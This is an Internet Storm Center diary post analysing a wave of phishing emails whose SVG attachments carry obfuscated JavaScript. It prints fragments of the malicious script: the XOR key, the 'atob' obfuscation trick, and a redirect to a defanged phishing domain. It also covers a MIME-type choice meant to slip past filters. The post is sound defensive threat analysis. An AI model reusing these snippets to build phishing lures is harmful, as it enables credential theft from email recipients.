New Wave Of Phishing Emails with SVG Files, (Tue, Jun 2nd)

For a few days, my SANS ISC mailbox is flooded with emails that delivers SVG files. An SVG ( Scalable Vector Graphic ) is a web-friendly vector file format used for graphics and icons. No URL in the body, just an image , that s the perfect way to deliver some malicious content. This isn t the first time that we see this technique used by threat actors[ 1 ]. This time, the SVG files are really simple and even don t contain any graphical element but a simple piece of JavaScript that will redirect the victim's browser to the phishing page: With the current wave, I just detected regular phishing pages but it could be any payload. The variable nl contains the targeted email address: nl = '$aGFuZGxlcnNAc2Fucy5lZHU='; // [email protected] The interesting payload is in oa , it contains a Base64-encode and XOR d string. The XOR key is in bd : const pt = b19208caeefa ; const rm = 51d1e7dcd384 ; const bd = pt + rm; The payload is decoded here: const cx = ['b', 'style', 'o', 't', 'a']; const kf = self[[cx[4], cx[3], cx[2], cx[0]].join('')]; const ts = kf(oa); const rabbit = Uint8Array.from(ts, (aa, ak) = aa.charCodeAt(0) ^ bd.charCodeAt(ak % bd.length) ); Finally, the variable rabbit is used to perform the redirect in the browser: window.location.href = hxxps://chinougoo[.]cfd/W74rH61S!x7sbhhS0bKPv/ + [email protected] ; This technique works because SVG files are handled by the browser by default on the Windows operating system. Note the TLD used ( .cfd ) which means Clothing, Fashion, and Design . It's a cheap TLD more and more abused in phishing campaigns[ 2 ]. A final note about the MIME type used in the SVG file: script type= application/ecmascript This is a official MIME type for ECMAScript, the standardized specification underlying JavaScript (standard ECMA-262)[ 3 ]. This has been used probably to defeat some common security controls that are looking for JavaScript . [1] https://isc.sans.edu/diary/Increase+In+Phishing+SVG+Attachments/31456 [2] https://radar.cloudflare.com/tlds/cfd?dateRange=7d [3] https://github.com/sudheerj/ECMAScript-features Xavier Mertens (@xme) Xameco Senior ISC Handler - Freelance Cyber Security Consultant PGP Key (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.